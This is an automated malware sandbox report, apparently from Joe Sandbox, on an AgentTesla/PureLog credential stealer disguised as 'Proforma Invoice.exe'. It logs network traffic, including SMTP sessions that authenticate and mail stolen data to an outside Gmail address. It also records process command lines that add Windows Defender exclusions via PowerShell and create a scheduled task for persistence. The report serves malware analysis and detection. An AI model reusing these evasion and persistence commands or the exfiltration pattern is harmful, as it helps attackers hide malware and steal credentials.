Feb 27, 2024 08:26:57.869065046 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:57.869105101 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:58.137742043 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:58.137830019 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:58.141211987 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:58.141233921 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:58.141761065 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:58.195111036 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:58.284296036 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:58.329909086 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:58.424669981 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:58.424906969 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:58.425189018 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:58.431250095 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:59.682511091 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:26:59.865139961 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:26:59.865238905 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:01.847554922 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:01.847775936 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:02.031174898 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:02.032288074 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:02.053471088 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.053524971 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.053617001 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.061269045 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.061296940 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.215349913 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:02.215950966 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:02.321228981 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.321636915 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.323220015 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.323229074 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.323941946 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.398310900 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.430123091 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.438625097 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:02.473907948 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.512758017 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:02.513128042 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:02.616300106 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.616647005 CET	443	49738	172.67.74.152	192.168.2.4
Feb 27, 2024 08:27:02.616955996 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.622531891 CET	49738	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:27:02.695749044 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:02.695775986 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:02.696296930 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:02.918858051 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:02.919197083 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:03.101927996 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:03.102018118 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:03.102734089 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:03.102734089 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:03.102803946 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:03.102803946 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:03.147762060 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:03.285402060 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:03.287079096 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:03.329740047 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:03.330010891 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:03.336184025 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:05.277101994 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:05.277499914 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:05.460086107 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:05.460613966 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:05.643049955 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:05.643462896 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:05.831377983 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:05.834887028 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:06.016946077 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:06.017261982 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:06.236444950 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:06.236768961 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:06.418874979 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:06.418896914 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:06.420070887 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:06.420135021 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:06.420169115 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:06.420203924 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:27:06.602018118 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:06.603281021 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:27:06.652070999 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:28:39.460927010 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:28:39.683779955 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:28:39.845330000 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:28:39.845398903 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:28:39.845464945 CET	49736	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:28:40.029422045 CET	587	49736	50.87.139.143	192.168.2.4
Feb 27, 2024 08:28:43.164463043 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:28:43.386923075 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:28:43.547872066 CET	587	49739	50.87.139.143	192.168.2.4
Feb 27, 2024 08:28:43.547946930 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:28:43.548003912 CET	49739	587	192.168.2.4	50.87.139.143
Feb 27, 2024 08:28:43.729939938 CET	587	49739	50.87.139.143	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 27, 2024 08:26:57.697048903 CET	57321	53	192.168.2.4	1.1.1.1
Feb 27, 2024 08:26:57.821093082 CET	53	57321	1.1.1.1	192.168.2.4
Feb 27, 2024 08:26:59.442615032 CET	61744	53	192.168.2.4	1.1.1.1
Feb 27, 2024 08:26:59.680124998 CET	53	61744	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 27, 2024 08:26:57.697048903 CET	192.168.2.4	1.1.1.1	0xfc01	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 27, 2024 08:26:59.442615032 CET	192.168.2.4	1.1.1.1	0x580	Standard query (0)	mail.elec-qatar.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 27, 2024 08:26:57.821093082 CET	1.1.1.1	192.168.2.4	0xfc01	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Feb 27, 2024 08:26:57.821093082 CET	1.1.1.1	192.168.2.4	0xfc01	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Feb 27, 2024 08:26:57.821093082 CET	1.1.1.1	192.168.2.4	0xfc01	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Feb 27, 2024 08:26:59.680124998 CET	1.1.1.1	192.168.2.4	0x580	No error (0)	mail.elec-qatar.com	50.87.139.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	172.67.74.152	443	7372	C:\Users\user\Desktop\Proforma Invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-27 07:26:58 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-02-27 07:26:58 UTC	211	IN	HTTP/1.1 200 OK Date: Tue, 27 Feb 2024 07:26:58 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 85beb3de9f487ff1-IAD
2024-02-27 07:26:58 UTC	12	IN	Data Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30 Data Ascii: 89.149.18.20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	172.67.74.152	443	7764	C:\Users\user\AppData\Roaming\VoAlKljQu.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-27 07:27:02 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-02-27 07:27:02 UTC	211	IN	HTTP/1.1 200 OK Date: Tue, 27 Feb 2024 07:27:02 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 85beb3f8cfbd878c-IAD
2024-02-27 07:27:02 UTC	12	IN	Data Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30 Data Ascii: 89.149.18.20

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 27, 2024 08:27:01.847554922 CET	587	49736	50.87.139.143	192.168.2.4	220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 00:27:01 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 27, 2024 08:27:01.847775936 CET	49736	587	192.168.2.4	50.87.139.143	EHLO 609290
Feb 27, 2024 08:27:02.031174898 CET	587	49736	50.87.139.143	192.168.2.4	250-box2248.bluehost.com Hello 609290 [89.149.18.20] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 27, 2024 08:27:02.032288074 CET	49736	587	192.168.2.4	50.87.139.143	AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
Feb 27, 2024 08:27:02.215349913 CET	587	49736	50.87.139.143	192.168.2.4	334 UGFzc3dvcmQ6
Feb 27, 2024 08:27:02.512758017 CET	587	49736	50.87.139.143	192.168.2.4	235 Authentication succeeded
Feb 27, 2024 08:27:02.513128042 CET	49736	587	192.168.2.4	50.87.139.143	MAIL FROM:<mohammed.abrar@elec-qatar.com>
Feb 27, 2024 08:27:02.695775986 CET	587	49736	50.87.139.143	192.168.2.4	250 OK
Feb 27, 2024 08:27:02.696296930 CET	49736	587	192.168.2.4	50.87.139.143	RCPT TO:<richcompaniesltd@gmail.com>
Feb 27, 2024 08:27:02.918858051 CET	587	49736	50.87.139.143	192.168.2.4	250 Accepted
Feb 27, 2024 08:27:02.919197083 CET	49736	587	192.168.2.4	50.87.139.143	DATA
Feb 27, 2024 08:27:03.102018118 CET	587	49736	50.87.139.143	192.168.2.4	354 Enter message, ending with "." on a line by itself
Feb 27, 2024 08:27:03.102803946 CET	49736	587	192.168.2.4	50.87.139.143	.
Feb 27, 2024 08:27:03.287079096 CET	587	49736	50.87.139.143	192.168.2.4	250 OK id=1rerrj-000tNz-02
Feb 27, 2024 08:27:05.277101994 CET	587	49739	50.87.139.143	192.168.2.4	220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 00:27:05 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 27, 2024 08:27:05.277499914 CET	49739	587	192.168.2.4	50.87.139.143	EHLO 609290
Feb 27, 2024 08:27:05.460086107 CET	587	49739	50.87.139.143	192.168.2.4	250-box2248.bluehost.com Hello 609290 [89.149.18.20] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 27, 2024 08:27:05.460613966 CET	49739	587	192.168.2.4	50.87.139.143	AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
Feb 27, 2024 08:27:05.643049955 CET	587	49739	50.87.139.143	192.168.2.4	334 UGFzc3dvcmQ6
Feb 27, 2024 08:27:05.831377983 CET	587	49739	50.87.139.143	192.168.2.4	235 Authentication succeeded
Feb 27, 2024 08:27:05.834887028 CET	49739	587	192.168.2.4	50.87.139.143	MAIL FROM:<mohammed.abrar@elec-qatar.com>
Feb 27, 2024 08:27:06.016946077 CET	587	49739	50.87.139.143	192.168.2.4	250 OK
Feb 27, 2024 08:27:06.017261982 CET	49739	587	192.168.2.4	50.87.139.143	RCPT TO:<richcompaniesltd@gmail.com>
Feb 27, 2024 08:27:06.236444950 CET	587	49739	50.87.139.143	192.168.2.4	250 Accepted
Feb 27, 2024 08:27:06.236768961 CET	49739	587	192.168.2.4	50.87.139.143	DATA
Feb 27, 2024 08:27:06.418896914 CET	587	49739	50.87.139.143	192.168.2.4	354 Enter message, ending with "." on a line by itself
Feb 27, 2024 08:27:06.420203924 CET	49739	587	192.168.2.4	50.87.139.143	.
Feb 27, 2024 08:27:06.603281021 CET	587	49739	50.87.139.143	192.168.2.4	250 OK id=1rerrm-000tQv-13
Feb 27, 2024 08:28:39.460927010 CET	49736	587	192.168.2.4	50.87.139.143	QUIT
Feb 27, 2024 08:28:39.845330000 CET	587	49736	50.87.139.143	192.168.2.4	221 box2248.bluehost.com closing connection
Feb 27, 2024 08:28:43.164463043 CET	49739	587	192.168.2.4	50.87.139.143	QUIT
Feb 27, 2024 08:28:43.547872066 CET	587	49739	50.87.139.143	192.168.2.4	221 box2248.bluehost.com closing connection

Target ID:	0
Start time:	08:26:53
Start date:	27/02/2024
Path:	C:\Users\user\Desktop\Proforma Invoice.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Proforma Invoice.exe
Imagebase:	0x120000
File size:	737'288 bytes
MD5 hash:	B774CA62D4F7E4A8359A40C7CAD50DDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1689723543.0000000005080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1689597695.0000000005000000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.0000000002988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:26:55
Start date:	27/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe
Imagebase:	0xaf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:26:55
Start date:	27/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:26:55
Start date:	27/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Imagebase:	0xaf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:26:55
Start date:	27/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:26:55
Start date:	27/02/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:26:55
Start date:	27/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:26:55
Start date:	27/02/2024
Path:	C:\Users\user\Desktop\Proforma Invoice.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Proforma Invoice.exe
Imagebase:	0xba0000
File size:	737'288 bytes
MD5 hash:	B774CA62D4F7E4A8359A40C7CAD50DDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:26:56
Start date:	27/02/2024
Path:	C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Imagebase:	0x7f0000
File size:	737'288 bytes
MD5 hash:	B774CA62D4F7E4A8359A40C7CAD50DDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs Detection: 65%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:26:57
Start date:	27/02/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:27:00
Start date:	27/02/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:27:00
Start date:	27/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:27:00
Start date:	27/02/2024
Path:	C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Imagebase:	0x750000
File size:	737'288 bytes
MD5 hash:	B774CA62D4F7E4A8359A40C7CAD50DDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	221
Total number of Limit Nodes:	14

Executed Functions

Function 06ECEAC0 Relevance: 7.3, Strings: 5, Instructions: 1026
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xbaq, xrefs: 06ECEBF0
4'^q, xrefs: 06ECF6B4
pbq, xrefs: 06ECF78C
Te^q, xrefs: 06ECF314
TJcq, xrefs: 06ECEC63

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$Te^q$pbq$xbaq
API String ID: 0-2576840827
Opcode ID: c278a03abe375b0d4c0ac35adbb62a682537b63114a2ed24abcdf31f45cc0ade
Instruction ID: 22ebff3adfcc5736248a3ec8c510fef7d599e889c2d324435eb0066556b683b4
Opcode Fuzzy Hash: c278a03abe375b0d4c0ac35adbb62a682537b63114a2ed24abcdf31f45cc0ade
Instruction Fuzzy Hash: D9B2B375E00628CFDB54CF69C984AD9BBB2FF89304F1581E9E509AB265DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 050BCE00 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3f4e4f7b1a0e03fefc072413795300a833eb770d3b87741c200c04ed7e0978
Instruction ID: 28a4dd51448d81ce1224a966aa1bc71faf0b177ae09a29c770f0096603fbb3d2
Opcode Fuzzy Hash: 1f3f4e4f7b1a0e03fefc072413795300a833eb770d3b87741c200c04ed7e0978
Instruction Fuzzy Hash: 76A00265DDF00586B000DD1430D52FCC13F521B009F403810065F3745205C1E408804D

Uniqueness

Uniqueness Score: -1.00%

Function 050B92FC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 253
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 050B953E

Strings

nCy, xrefs: 050B9372
nCy, xrefs: 050B9343

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: CreateProcess
String ID: nCy$nCy
API String ID: 963392458-1366251309
Opcode ID: 52c4d8077647c06c95205a0930e19f5331a5bf2a9719fb3911c5b1bc888e6618
Instruction ID: 428446d39f750f967ce6868d33fcce6403113ffbbea8fa382df5ef93dc68d47d
